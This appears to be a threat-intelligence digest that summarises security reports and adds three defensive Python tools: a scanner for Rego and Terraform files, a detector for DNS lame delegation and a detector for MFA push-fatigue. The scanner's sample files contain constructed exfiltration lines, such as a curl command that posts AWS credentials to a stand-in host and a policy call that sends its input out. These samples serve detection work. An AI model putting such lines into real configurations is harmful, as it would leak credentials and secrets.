Summary: Silent Push has been investigating the FUNNULL content delivery network for two years, uncovering a vast malicious domain cluster linked to a range of cybercriminal activity. Their findings include over 200,000 hostnames generated by a domain generation algorithm (DGA), along with numerous suspicious indicators and artifacts. The research highlights the value of monitoring such networks for threat detection and response.…

Summary: Research by WhoisXML API highlights the rise in cyber threats around Thanksgiving and Black Friday, revealing numerous malicious domains and IP addresses. The study identified significant numbers of email-connected domains, IP addresses, and suspicious subdomains that could serve as attack vectors, and emphasizes the need for vigilance during holiday shopping periods.…

Summary: As Thanksgiving approaches, threat actors exploit holiday-themed domains to lure victims. Recent research uncovered numerous malicious domains and IP addresses linked to Black Friday- and Thanksgiving-themed attacks, highlighting the need for vigilance during the shopping season. #ThanksgivingThreats #BlackFridayScams #CyberAwareness

Key Point: 318 email-connected domains identified, with one deemed malicious.…

### #WordPressSecurity #PluginVulnerabilities #WebApplicationRisks

Summary: A report has identified two critical vulnerabilities in the Anti-Spam by CleanTalk WordPress plugin, affecting over 200,000 installations and allowing unauthenticated attackers to compromise websites. Users are urged to update to the latest version to mitigate these risks.

Threat Actor: Unauthenticated attackers | Victim: Anti-Spam by CleanTalk users

Key Point:

Two vulnerabilities, CVE-2024-10542 and CVE-2024-10781, allow unauthenticated attackers to install and activate arbitrary plugins, which can be leveraged for remote code execution.…

### #InfrastructureSecurity #PolicyExploitation #CloudBreach

Summary: Security researchers have disclosed new attack techniques against infrastructure-as-code (IaC) and policy-as-code (PaC) tools, specifically HashiCorp’s Terraform and Open Policy Agent (OPA), that abuse legitimate features of their domain-specific languages (HCL and Rego) to compromise cloud platforms and exfiltrate sensitive data. The tools’ security controls do not stop attacks that rely on intended functionality, such as running commands or making network requests during a plan or policy evaluation, so malicious configurations and policies have to be caught before they are evaluated.…

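One practical consequence of the Terraform/OPA research above is that IaC and PaC files need a review gate before `terraform plan` or `opa eval` ever runs them. The script below is an added example, not code from the researchers or from either project: it scans Rego and HCL text for the constructs that give a policy or configuration the ability to run commands or reach the network (Rego’s `http.send` and `net.lookup_ip_addr` built-ins, Terraform’s `data "external"` source and `local-exec`/`remote-exec` provisioners). Those built-ins and blocks are real features of the two tools; the choice of which ones to gate, the allow-list mechanism, and the sample policy and configuration are this example’s own assumptions.

```python
"""Pre-evaluation gate for Rego policies and Terraform configurations.

Added example. Flags constructs that let a policy or config execute code or
make outbound requests when it is evaluated. Rule selection is an assumption;
the constructs themselves exist in OPA and Terraform.
"""
import re
from dataclasses import dataclass
from typing import List, Optional, Set, Tuple
from urllib.parse import urlparse


@dataclass
class Finding:
    kind: str      # "rego" or "hcl"
    line_no: int   # 1-based line in the scanned text
    rule: str      # short rule id
    reason: str
    line: str      # offending line, stripped


# (file kind, rule id, reason, regex)
RULES: List[Tuple[str, str, str, re.Pattern]] = [
    ("rego", "REGO_HTTP_SEND",
     "http.send makes outbound requests during policy evaluation",
     re.compile(r"\bhttp\.send\s*\(")),
    ("rego", "REGO_DNS",
     "net.lookup_ip_addr resolves names (possible DNS covert channel)",
     re.compile(r"\bnet\.lookup_ip_addr\s*\(")),
    ("hcl", "TF_EXTERNAL",
     'data "external" executes a local program during terraform plan',
     re.compile(r'\bdata\s+"external"')),
    ("hcl", "TF_LOCAL_EXEC",
     'provisioner "local-exec" runs a command on the Terraform runner',
     re.compile(r'\bprovisioner\s+"local-exec"')),
    ("hcl", "TF_REMOTE_EXEC",
     'provisioner "remote-exec" runs commands on the provisioned host',
     re.compile(r'\bprovisioner\s+"remote-exec"')),
]

URL_RE = re.compile(r"https?://[^\s\"']+")


def _is_comment(kind: str, line: str) -> bool:
    s = line.lstrip()
    return s.startswith("#") or (kind == "hcl" and s.startswith("//"))


def scan_text(kind: str, text: str, allowed_hosts: Optional[Set[str]] = None) -> List[Finding]:
    """Return findings for one Rego ("rego") or Terraform ("hcl") document.

    An http.send whose URL literal on the same line targets an allow-listed
    host (e.g. a JWKS endpoint) is not reported; multi-line calls are always
    reported, which errs on the side of review.
    """
    allowed_hosts = allowed_hosts or set()
    findings: List[Finding] = []
    for no, line in enumerate(text.splitlines(), start=1):
        if _is_comment(kind, line):
            continue
        for rule_kind, rule, reason, rx in RULES:
            if rule_kind != kind or not rx.search(line):
                continue
            if rule == "REGO_HTTP_SEND":
                m = URL_RE.search(line)
                if m and urlparse(m.group(0)).hostname in allowed_hosts:
                    continue
            findings.append(Finding(kind, no, rule, reason, line.strip()))
    return findings


def gate(documents: List[Tuple[str, str]],
         allowed_hosts: Optional[Set[str]] = None) -> Tuple[bool, List[Finding]]:
    """Scan every (kind, text) pair; passes only when nothing is flagged."""
    findings: List[Finding] = []
    for kind, text in documents:
        findings.extend(scan_text(kind, text, allowed_hosts))
    return (not findings, findings)


# Constructed samples (not real policies or configs).
SAMPLE_REGO = '''package authz

default allow := false

allow if {
    input.user.role == "admin"
    # constructed sample: ship the whole input document to an attacker host
    http.send({"method": "POST", "url": "https://collector.invalid/log", "body": input})
}

jwks := http.send({"method": "GET", "url": "https://idp.example.com/.well-known/jwks.json"}).body
'''

SAMPLE_HCL = '''resource "aws_s3_bucket" "logs" {
  bucket = "example-logs"

  // constructed sample: leak runner credentials during apply
  provisioner "local-exec" {
    command = "curl -s -d @$HOME/.aws/credentials https://collector.invalid/"
  }
}

data "external" "secrets" {
  program = ["sh", "-c", "cat /run/secrets/db_password"]
}
'''

if __name__ == "__main__":
    ok, found = gate([("rego", SAMPLE_REGO), ("hcl", SAMPLE_HCL)], {"idp.example.com"})
    for f in found:
        print(f"{f.kind}:{f.line_no} {f.rule}: {f.reason}\n    {f.line}")
    print("PASS" if ok else "BLOCKED")
```

OPA can also enforce the Rego side at the engine: a capabilities file passed with `--capabilities` that omits `http.send` from `builtins` makes such a policy fail to compile, and its `allow_net` list restricts the hosts the remaining built-ins may reach. Terraform has no equivalent switch for provisioners or the `external` data source, so the configuration scan is the control that matters there.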
Summary: A recent phishing campaign targeting the telecommunications and financial sectors has been identified, utilizing Google Docs to deliver malicious links that redirect victims to fake login pages hosted on Weebly. By leveraging trusted platforms, attackers evade detection and enhance user trust, leading to increased success rates.…

### #CyberSecurity #MalwareAnalysis #ThreatIntelligence

Summary: Volexity’s analysis reveals that the Chinese state-affiliated threat actor BrazenBamboo is exploiting a vulnerability in Fortinet’s FortiClient VPN client for Windows, in which credentials remain in process memory after authentication, through its DEEPDATA malware family. DEEPDATA extracts sensitive information, including user credentials, from compromised systems.…

Summary: Cadet Blizzard (DEV-0586) is a Russian GRU-affiliated cyber threat group that has been active since at least 2020, primarily targeting Ukrainian government agencies and critical infrastructure. Following a series of cyberattacks during the 2022 Russian invasion of Ukraine, the group has expanded its operations to Europe and Latin America, employing sophisticated tactics for espionage and disruption.…

Summary: Over 1 million domains are potentially vulnerable to “Sitting Ducks” attacks, which exploit DNS misconfigurations (lame delegations, where a domain’s name servers point at a DNS provider that does not actually serve the zone) to hijack domains for malicious purposes. The report by Infoblox Threat Intel highlights how simple these attacks are to execute and how hard they are to detect.

Threat Actor: Actor clusters Infoblox tracks as Vipers and Hawks | Victim: Various organizations and individuals

Key Point:

Over 800,000 domains remain vulnerable to hijacking, with 70,000 already compromised.…
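The Sitting Ducks precondition is checkable from the outside: a registered domain is a candidate when its NS records delegate to a third-party DNS provider and every delegated server at that provider fails to answer authoritatively for the zone, because an attacker can then open an account with the provider and claim the name. The code below is an added example, not part of the Infoblox report: it encodes that classification over injected probe results so it runs offline. The names, the constructed probe table, and the two-label provider heuristic are assumptions; in production the probe would be a real SOA query with recursion disabled and the provider lookup would use a public suffix list. Whether a given provider verifies ownership before letting a zone be claimed is a manual check that DNS cannot answer.

```python
"""Lame-delegation classifier for the "Sitting Ducks" precondition.

Added example (not from the Infoblox report). Names, probe results and the
two-label provider heuristic are constructed assumptions.
"""
from collections import defaultdict
from dataclasses import dataclass, field
from typing import Callable, Dict, List, Set, Tuple


@dataclass(frozen=True)
class SoaProbe:
    """Result of asking one delegated name server for the domain's SOA with RD=0."""
    rcode: str           # DNS rcode text: NOERROR, REFUSED, SERVFAIL, NXDOMAIN, ...
    authoritative: bool  # AA flag set in the response
    has_soa: bool        # answer section holds an SOA for the queried name


@dataclass
class DelegationReport:
    domain: str
    delegated_ns: List[str]
    lame_ns: List[str] = field(default_factory=list)
    claimable_providers: List[str] = field(default_factory=list)
    sitting_duck_candidate: bool = False


def is_lame(probe: SoaProbe) -> bool:
    """A delegated server that cannot give an authoritative SOA for the zone is lame.

    REFUSED/SERVFAIL, a non-authoritative (AA=0) answer from a recursive
    resolver, or an empty NOERROR all count.
    """
    return not (probe.rcode == "NOERROR" and probe.authoritative and probe.has_soa)


def provider_of(ns: str) -> str:
    # Assumption: provider == last two labels. Real names (ns1.example.co.uk)
    # need a public suffix list.
    labels = ns.rstrip(".").lower().split(".")
    return ".".join(labels[-2:])


def under_any(name: str, suffixes: Set[str]) -> bool:
    n = name.rstrip(".").lower()
    return any(n == s or n.endswith("." + s)
               for s in (x.rstrip(".").lower() for x in suffixes))


def assess(domain: str, delegated_ns: List[str], registrar_dns_suffixes: Set[str],
           probe: Callable[[str, str], SoaProbe]) -> DelegationReport:
    """Classify one domain.

    `probe(ns, domain)` performs the SOA query and is injected so this logic
    can run offline. A provider is "claimable" when all delegated servers at
    it are lame and it is not the registrar's own DNS service (the registrar
    case is not exploitable via a third-party account).
    """
    report = DelegationReport(domain, list(delegated_ns))
    by_provider: Dict[str, List[Tuple[str, bool]]] = defaultdict(list)
    for ns in delegated_ns:
        lame = is_lame(probe(ns, domain))
        if lame:
            report.lame_ns.append(ns)
        by_provider[provider_of(ns)].append((ns, lame))
    for prov, servers in by_provider.items():
        if all(l for _, l in servers) and not under_any(prov, registrar_dns_suffixes):
            report.claimable_providers.append(prov)
    report.sitting_duck_candidate = bool(report.claimable_providers)
    return report


# Constructed probe results (no network), keyed by (name server, domain).
FAKE_ANSWERS: Dict[Tuple[str, str], SoaProbe] = {
    ("ns1.dnshost.invalid", "victim.example"):  SoaProbe("REFUSED", False, False),
    ("ns2.dnshost.invalid", "victim.example"):  SoaProbe("REFUSED", False, False),
    ("ns1.dnshost.invalid", "healthy.example"): SoaProbe("NOERROR", True, True),
    ("ns2.dnshost.invalid", "healthy.example"): SoaProbe("NOERROR", True, True),
    # lame, but the registrar runs these servers: not claimable by a third party
    ("ns1.registrar-dns.invalid", "parked.example"): SoaProbe("SERVFAIL", False, False),
    ("ns2.registrar-dns.invalid", "parked.example"): SoaProbe("SERVFAIL", False, False),
    # split delegation: one provider serves the zone, the other answers non-authoritatively
    ("ns1.dnshost.invalid", "split.example"):   SoaProbe("NOERROR", True, True),
    ("ns1.otherdns.invalid", "split.example"):  SoaProbe("NOERROR", False, False),
}


def fake_probe(ns: str, domain: str) -> SoaProbe:
    return FAKE_ANSWERS[(ns, domain)]


if __name__ == "__main__":
    r = assess("victim.example", ["ns1.dnshost.invalid", "ns2.dnshost.invalid"],
               {"registrar-dns.invalid"}, fake_probe)
    print(r)
```

A real `probe` would resolve the name server, build the query with dnspython’s `dns.message.make_query(domain, "SOA")`, clear `dns.flags.RD` from its `flags`, send it with `dns.query.udp`, and read the response’s `rcode()`, AA flag and answer section into a `SoaProbe`. Running the classifier over a registrar export finds the domains worth fixing: either delete the stale delegation or recreate the zone at the provider before someone else does.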

Summary: Security researchers from Hunt.io have identified a cyber operation utilizing the Sliver command-and-control framework and Ligolo-ng tunneling tool, targeting victims by impersonating Y Combinator. The operation highlights the evolving tactics of cybercriminals leveraging trusted brands to establish credibility and evade detection.

Threat Actor: Cybercriminals | Victim (impersonated brand): Y Combinator

Key Point:

The attackers registered a domain mimicking Y Combinator to deflect suspicion and establish a facade of authenticity.…

Summary: Microsoft’s November 2024 Patch Tuesday addresses 91 vulnerabilities, including four publicly disclosed zero-days, two of which are being actively exploited. The updates fix several flaw classes, including remote code execution and elevation of privilege.

Threat Actor: Unknown | Victim: Microsoft (affected vendor)

Key Point:

Four zero-day vulnerabilities were disclosed, two of which were actively exploited in attacks.…

Summary: This blog post discusses phishing techniques used by the threat actor 0ktapus to compromise cloud identities and outlines methods for investigating phishing campaigns. It provides a comprehensive framework for identifying phishing infrastructure and highlights the importance of ongoing vigilance in cybersecurity practices.

Threat Actor: 0ktapus | Victim: Various organizations

Key Point:

0ktapus employs sophisticated phishing techniques, including smishing, vishing, and MFA fatigue, to target IT service desk workers and gain access to cloud environments.…
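MFA fatigue, one of the 0ktapus techniques named above, leaves a distinctive trace in identity-provider logs: a burst of push challenges for one account that are denied or time out, sometimes ending in an approval. The detector below is an added example and not from the blog post it summarizes. It runs a per-user sliding window over constructed sample log lines and emits two kinds of alert: an attempt (the burst alone) and a success (an approval right after a burst), which is the one that needs an immediate session revoke. The log format, field names and thresholds are assumptions; map them to your provider’s push-challenge events.

```python
"""MFA push-fatigue detector over identity-provider log lines.

Added example. The log format (<timestamp> <user> <event> <result> <ip>),
the thresholds and the sample data are constructed assumptions.
"""
from collections import defaultdict, deque
from datetime import datetime, timedelta
from typing import Deque, Dict, Iterable, List, Tuple

# Constructed sample log (not real data). alice: 5 unanswered pushes then an
# approval (fatigue that worked). carol: 5 unanswered, no approval. bob: one
# deny then approve (benign). dave: 5 denies spread over an hour (below rate).
SAMPLE_LOG = """\
2024-11-20T09:00:01Z alice mfa.push denied 203.0.113.5
2024-11-20T09:00:10Z dave  mfa.push denied 198.51.100.7
2024-11-20T09:00:40Z alice mfa.push denied 203.0.113.5
2024-11-20T09:01:15Z alice mfa.push timeout 203.0.113.5
2024-11-20T09:01:50Z alice mfa.push denied 203.0.113.5
2024-11-20T09:02:30Z alice mfa.push denied 203.0.113.5
2024-11-20T09:03:10Z alice mfa.push approved 203.0.113.5
2024-11-20T09:10:00Z carol mfa.push denied 203.0.113.9
2024-11-20T09:11:00Z carol mfa.push denied 203.0.113.9
2024-11-20T09:12:00Z carol mfa.push denied 203.0.113.9
2024-11-20T09:13:00Z carol mfa.push timeout 203.0.113.9
2024-11-20T09:14:00Z carol mfa.push denied 203.0.113.9
2024-11-20T09:15:00Z dave  mfa.push denied 198.51.100.7
2024-11-20T09:20:00Z bob   mfa.push denied 192.0.2.44
2024-11-20T09:21:00Z bob   mfa.push approved 192.0.2.44
2024-11-20T09:30:00Z dave  mfa.push denied 198.51.100.7
2024-11-20T09:45:00Z dave  mfa.push denied 198.51.100.7
2024-11-20T10:00:00Z dave  mfa.push denied 198.51.100.7
"""

Event = Tuple[datetime, str, str, str]  # (time, user, result, source ip)


def parse(lines: Iterable[str]) -> List[Event]:
    """Keep only push-challenge events, oldest first; skip malformed lines."""
    events: List[Event] = []
    for line in lines:
        parts = line.split()
        if len(parts) != 5 or parts[2] != "mfa.push":
            continue
        ts = datetime.strptime(parts[0], "%Y-%m-%dT%H:%M:%SZ")
        events.append((ts, parts[1], parts[3], parts[4]))
    events.sort(key=lambda e: e[0])
    return events


def detect_mfa_fatigue(lines: Iterable[str], window: timedelta = timedelta(minutes=10),
                       burst: int = 5, approve_after: int = 3) -> List[Dict[str, object]]:
    """Return alerts. Per user, keep the times of pushes not approved within
    `window`. Reaching `burst` of them is an "attempt"; an approval while at
    least `approve_after` are pending is a "success" (likely coerced tap)."""
    pending: Dict[str, Deque[datetime]] = defaultdict(deque)
    alerts: List[Dict[str, object]] = []
    for ts, user, result, ip in parse(lines):
        dq = pending[user]
        while dq and ts - dq[0] > window:   # drop pushes older than the window
            dq.popleft()
        if result == "approved":
            if len(dq) >= approve_after:
                alerts.append({"user": user, "kind": "success", "prior_pushes": len(dq),
                               "at": ts.isoformat(), "ip": ip})
            dq.clear()                      # an approval ends the burst either way
            continue
        dq.append(ts)                       # denied / timeout / any non-approval
        if len(dq) == burst:                # fire once per burst, not on every extra push
            alerts.append({"user": user, "kind": "attempt", "prior_pushes": burst,
                           "at": ts.isoformat(), "ip": ip})
    return alerts


if __name__ == "__main__":
    for a in detect_mfa_fatigue(SAMPLE_LOG.splitlines()):
        print(a)
```

A "success" alert should drive an automated response (revoke the user’s sessions and tokens, force re-enrollment) rather than a ticket. The preventive fix is to stop blind approvals altogether: number matching or push notifications that show the requesting application and location remove the single tap the fatigue technique depends on.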

Summary: CloudSEK’s Threat Research team has identified significant threats posed by the Androxgh0st botnet, which has been exploiting multiple vulnerabilities since January 2024. This botnet targets various technologies, including web servers and IoT devices, and shows signs of operational integration with the Mozi botnet. Immediate patching of the exploited vulnerabilities is recommended to mitigate the risk.…